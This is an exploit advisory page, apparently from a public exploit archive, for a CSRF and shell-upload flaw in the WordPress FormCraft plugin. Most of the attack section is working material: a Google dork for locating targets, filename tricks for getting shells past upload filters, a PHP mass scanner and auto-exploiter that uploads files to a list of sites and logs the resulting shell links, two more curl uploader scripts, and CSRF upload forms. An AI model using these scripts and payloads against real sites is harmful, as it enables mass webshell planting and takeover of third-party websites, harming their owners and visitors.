exploit the possibilities

WordPress FormCraft 2.0 CSRF / Shell Upload

WordPress FormCraft 2.0 CSRF / Shell Upload
Posted Mar 18, 2019
Authored by KingSkrupellos

WordPress version 5.0.4 with FormCraft plugin version 2.0 suffers from a cross site request forgery vulnerability that can be leveraged to perform a shell upload.

tags | exploit, shell, csrf
MD5 | 34bba172e28c83ea38f0a59db712f769

WordPress FormCraft 2.0 CSRF / Shell Upload

Change Mirror Download
############################################################################################

# Exploit Title : WordPress 5.0.4 FormCraft Plugins 2.0 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/03/2019
# Vendor Homepages : formcraft-wp.com ~ ncrafts.net ~ formcrafts.com
# Software Download Links : formcrafts.com/formcrafts-form-builder.zip
downloads.wordpress.org/plugin/formcraft-form-builder.zip
# Software Information Links : wordpress.org/plugins/formcraft-form-builder/
wpexplorer.com/formcraft-drag-drop-form-builder-wordpress-plugin/
codecanyon.net/item/formcraft-premium-wordpress-form-builder/5335056
formcrafts.com/integrations/wordpress
formcraft-wp.com/addons/stripe/
# Software Affected Version : 1.2.0 - 1.2.1 - 1.2.3 / 2.0 and All Versions
Compatible with WordPress [ Vulnerable WP Versions ] =>
3.6 - 4.2.2 - 4.2.7 - 4.5 - 4.9.9 - 4.9.1 - 5.0.x - 5.0.4
# Software Price Type : Free / Paid Download / 36$
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/formcraft/''
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# JVN : jvn.jp/en/jp/JVN83501605/index.html
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
# Cyberizm Exploit Reference Link :
cyberizm.org/cyberizm-wordpress-formcraft-auto-php-csrf-exploiter.html

############################################################################################

# Description about Software :
***************************
FormCraft is a drag-and-drop form builder to create and embed forms, and track submissions for WordPress.

############################################################################################

# Impact :
***********
* The software allows the attacker to upload or transfer files of dangerous types that can be automatically processed within

the product's environment. * Weaknesses in this category are related to the management of permissions, privileges, and

other security features that are used to perform access control. * This software has Cross Site Request Forgery Vulnerability

because the web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally

provided by the user who submitted the request.

* The vulnerability CSRF allows a remote attacker to perform cross-site request forgery attacks.

The vulnerability exists due to insufficient validation of the HTTP request origin. A remote attacker can trick the victim to visit a

specially crafted web page and perform arbitrary actions on behalf of the victim on the vulnerable website, such as generat

new forms, insert JavaScript code to existing forms, and delete existing forms.

* WordPress FormCraft Plugins 2.0 and 1.2.3 and other versions is prone to a

vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process.

This may facilitate unauthorized access or privilege escalation; other attacks are also possible. WordPress 5.0.4

FormCraft 2.0 and 1.2.3 is vulnerable; prior versions may also be affected.

############################################################################################

Installation =>
*************
Extract the download package to a temporary location.
Zip the folder formcraft
Log in to WordPress and click on the Add New option under Plugins.
Click on the Upload link.
Click on Choose File and browse the zipped file formcraft and click on Install.
Now activate the plugin
If you are facing trouble with the file upload field, you need to set the permissions of the directory
/wp-content/plugins/formcraft/file-upload/server/ and sub directories, and files to 755

############################################################################################

# CSRF / PHP / Arbitrary File Upload / File Insertion Exploit :
*****************************************************
Vulnerability =>
**************
/wp-content/plugins/formcraft/file-upload/server/php/upload.php

/wp-content/plugins/formcraft/file-upload/server/content/upload.php

Vulnerability Error =>
*********************
{"failed":"No file found 2"}

Directory File Path :
*******************
/wp-content/plugins/formcraft/file-upload/server/php/files/.....

/wp-content/plugins/formcraft/file-upload/server/content/files/....

/wp-content/plugins/formcraft/file-upload/server/php/files/[RANDOM-NUMBERS-WORDS]yourshellname.php

Note : yourfilename.html .txt .gif .png .gif - Try to upload your shell files extensions like this =>

SH3LL.php.pjpg - SH3LL.php;.gif - SH3LL.asp:,fla - SH3LL.phtml - SH3LL.php5 - SH3LL.php -

Sh3LL.asp;.jpeg - Sh3LL.php;.gif ;.jpeg - Sh3LL.php;.swf ;.flv - Sh3LL.php;.pjpg ;.jpeg and etcetra.....

Try on your Computer LocalHost.

Note 2 : If sites says like this " {"failed":"Not writable"} " The vulnerability has been fixed.

###########################################################################################

PHP Auto Exploitation Tool 1 =>
***************************
<?php
print"
Cyberizm WordPress FormCraft Scanner + Auto Exploiter
Mr. KingSkrupellos - Cyberizm Digital Security Team
";
error_reporting(0);
set_time_limit(0);

if(!file_exists($argv[1])){
die('
File Not Found
usage: php formcraft.php sites.txt

');
}
$file=@fopen('shell.phtml','a+');

$get=file_get_contents($argv[1]);
$ex=explode("\n",$get);
$c=file($argv[1]);
echo"Total target : ".count($c)."\n\n";

foreach($c as $sites){
echo "scanning site : $sites";
$sites=trim($sites);

$urlex='/wp-content/plugins/formcraft/file-upload/server/php/upload.php';
$url1=($sites).($urlex) ;
$get1=@file_get_contents($url1);
if(eregi('{"files":',$get1)){
echo"[!] HAHAHA VULNERABILITY FOUND :* [!]\n";

$kingskrupellos = "loader.php"; // loader.php = <?php phpinfo();
// plz readme
$ewe = array("files[]"=>"@$kingskrupellos");
$ch = curl_init("$sites/wp-content/plugins/formcraft/file-upload/server/php/");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $ewe);
$data = curl_exec ($ch);
curl_close ($ch);
echo "[+]Exploited: $data\n\n";
fwrite($file,"<a href="."$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"." target="."_blank".">$sites/wp-content/plugins/formcraft/file-upload/server/php/files/$kingskrupellos"."</a><br>");
}else{
echo"NOT VULN\n\n";
}
}
print "
shell saved in shell.phtml
";
?>

###########################################################################################

PHP Exploiter Code 2 :
*********************
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

###########################################################################################

PHP Exploiter Code 3 :
*********************
<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/formcraft/file-upload/server/php/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

###########################################################################################

CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

-------------------------------------------------------------------------------------------------------------------------------------------------------------

CSRF Cross Site Request Forgery Exploiter 2 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/formcraft/file-upload/server/content/upload.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

############################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

############################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    24 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    7 Files
  • 4
    Oct 4th
    4 Files
  • 5
    Oct 5th
    10 Files
  • 6
    Oct 6th
    1 Files
  • 7
    Oct 7th
    21 Files
  • 8
    Oct 8th
    19 Files
  • 9
    Oct 9th
    5 Files
  • 10
    Oct 10th
    20 Files
  • 11
    Oct 11th
    17 Files
  • 12
    Oct 12th
    4 Files
  • 13
    Oct 13th
    4 Files
  • 14
    Oct 14th
    15 Files
  • 15
    Oct 15th
    19 Files
  • 16
    Oct 16th
    25 Files
  • 17
    Oct 17th
    17 Files
  • 18
    Oct 18th
    7 Files
  • 19
    Oct 19th
    1 Files
  • 20
    Oct 20th
    4 Files
  • 21
    Oct 21st
    5 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close